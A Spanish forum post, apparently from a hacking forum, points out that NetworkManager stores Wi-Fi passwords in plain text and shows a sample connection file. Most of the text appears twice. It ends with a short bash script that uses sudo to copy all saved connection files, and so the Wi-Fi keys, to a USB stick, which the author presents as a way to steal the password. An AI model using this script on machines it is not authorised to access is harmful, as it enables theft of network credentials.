Hoy aburrido en mi casa sin bajar a la calle ya que con el verano de calor que estamos teniendo en España no apetece, me aburria y me decidi buscar archivos de configuración de linux y hoy he dado con uno que no me a gustado nada se trata del archivo de configuración del NetworkMager el programa que nos hace mas facil la vida en linux para poder conectarnos sin tener que configurarlo todo a mano pero me dado cuenta de una cosa guarda todo en texto plano incluso las contraseñas Wifi y esto es lo que no me ha hecho mucha gracia el archivo se encuentra en:
/etc/NetworkManager/system-connections
y dentro de esta carpeta abra un archivito llamado como el SSID de vuestra wifi al intenatr abrirlo no he podido ya que soy un simple usuario pero al hacer un sudo cat SSID.De.La.Red me ha mostrado esto:
[connection]
id=Aqui salia el
SSID de mi red.
uuid=
type=802-11-wireless
autoconnect=true
timestamp=1273841038
[802-11-wireless-security]
key-mgmt=none
wep-tx-keyidx=0
auth-alg=open
wep-key0= Y aquí mi contraseña.
wep-key-type=1
[ipv4]
method=manual
dns=62.42.230.24;64.42.63.53;8.8.8.8;
Los servidores DNS
addresses1=192.168.0.12;24;192.168.0.1;
La Ip de mi PC y la puerta de enlace.
ignore-auto-routes=false
ignore-auto-dns=false
dhcp-send-hostname=false
never-default=false
[ipv6]
method=ignore
ignore-auto-routes=false
ignore-auto-dns=false
never-default=false
[802-11-wireless]
ssid=82;101;100;76;111;99;97;108;68;101;70;97;110;100;82;
mode=infrastructure
channel=0
rate=0
tx-power=0
mtu=0
seen-bssids=;
security=802-11-wireless-security
Como podemos ver sale absolutamente todo el SSID la contraseña, la mac del router, tambien sale las ips y los servidores DNS pero esto no me molesta tenerlo en texto plano, pero el resto no se a ustedes pero a mi no me gusta tener guardada ninguna contraseña en texto plano en el ordenador aunque se necesite la contraseña del root para leerla. ¿Y ha ustedes que les parce un agujero de seguridad o no?.![:-\](https://forum.elhacker.net/Smileys/navidad/undecided.gif ":-\")
Tambien he programado un pequeño script que ejecutandolo desde un pendrive robaria esta contraseña y la guardaria en nuestro pendrive como ven es facilisimo hacerse con la contraseña teniendo acceso al PC.
Escrito por Fayre Salu2
/etc/NetworkManager/system-connections
y dentro de esta carpeta abra un archivito llamado como el SSID de vuestra wifi al intenatr abrirlo no he podido ya que soy un simple usuario pero al hacer un sudo cat SSID.De.La.Red me ha mostrado esto:
[connection]
id=Aqui salia el
SSID de mi red.
uuid=
type=802-11-wireless
autoconnect=true
timestamp=1273841038
[802-11-wireless-security]
key-mgmt=none
wep-tx-keyidx=0
auth-alg=open
wep-key0= Y aquí mi contraseña.
wep-key-type=1
[ipv4]
method=manual
dns=62.42.230.24;64.42.63.53;8.8.8.8;
Los servidores DNS
addresses1=192.168.0.12;24;192.168.0.1;
La Ip de mi PC y la puerta de enlace.
ignore-auto-routes=false
ignore-auto-dns=false
dhcp-send-hostname=false
never-default=false
[ipv6]
method=ignore
ignore-auto-routes=false
ignore-auto-dns=false
never-default=false
[802-11-wireless]
ssid=82;101;100;76;111;99;97;108;68;101;70;97;110;100;82;
mode=infrastructure
channel=0
rate=0
tx-power=0
mtu=0
seen-bssids=;
security=802-11-wireless-security
Como podemos ver sale absolutamente todo el SSID la contraseña, la mac del router, tambien sale las ips y los servidores DNS pero esto no me molesta tenerlo en texto plano, pero el resto no se a ustedes pero a mi no me gusta tener guardada ninguna contraseña en texto plano en el ordenador aunque se necesite la contraseña del root para leerla. ¿Y ha ustedes que les parce un agujero de seguridad o no?.
Tambien he programado un pequeño script que ejecutandolo desde un pendrive robaria esta contraseña y la guardaria en nuestro pendrive como ven es facilisimo hacerse con la contraseña teniendo acceso al PC.
Código [Seleccionar]
#!/bin/bash
ruta=$0
cortada=${ruta%/*}
sudo cp "/etc/NetworkManager/system-connections/"* "$cortada"
comprobacion=$?
if [ "$comprobacion" = "0" ]; then
gdialog --msgbox "Correcto"
else
gdialog --msgbox "Fallido"
fi
Escrito por Fayre Salu2